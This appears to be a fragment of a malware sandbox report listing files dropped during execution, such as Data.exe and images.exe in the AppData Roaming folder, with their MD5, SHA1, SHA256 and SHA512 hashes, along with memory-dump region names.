SHA512 ace0e666083a77f3f8a69e888a140b227295bafd8052d1ee275bf72583d841f07b5f7e09f2c2872452512d224b002874ecd01ede16028bab4e354e112b1d0971

memory/268-143-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

memory/768-155-0x0000000000A50000-0x0000000000A8A000-memory.dmp

memory/768-153-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE

MD5 07e194ce831b1846111eb6c8b176c86e
SHA1 b9c83ec3b0949cb661878fb1a8b43a073e15baf1
SHA256 d882f673ddf40a7ea6d89ce25e4ee55d94a5ef0b5403aa8d86656fd960d0e4ac
SHA512 55f9b6d3199aa60d836b6792ae55731236fb2a99c79ce8522e07e579c64eabb88fa413c02632deb87a361dd8490361aa1424beed2e01ba28be220f8c676a1bb5

\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

memory/1844-159-0x0000000000000000-mapping.dmp

memory/2024-161-0x0000000000000000-mapping.dmp

memory/952-165-0x00000000000A0000-0x00000000000DA000-memory.dmp

memory/952-164-0x0000000000000000-mapping.dmp

memory/1516-162-0x0000000000000000-mapping.dmp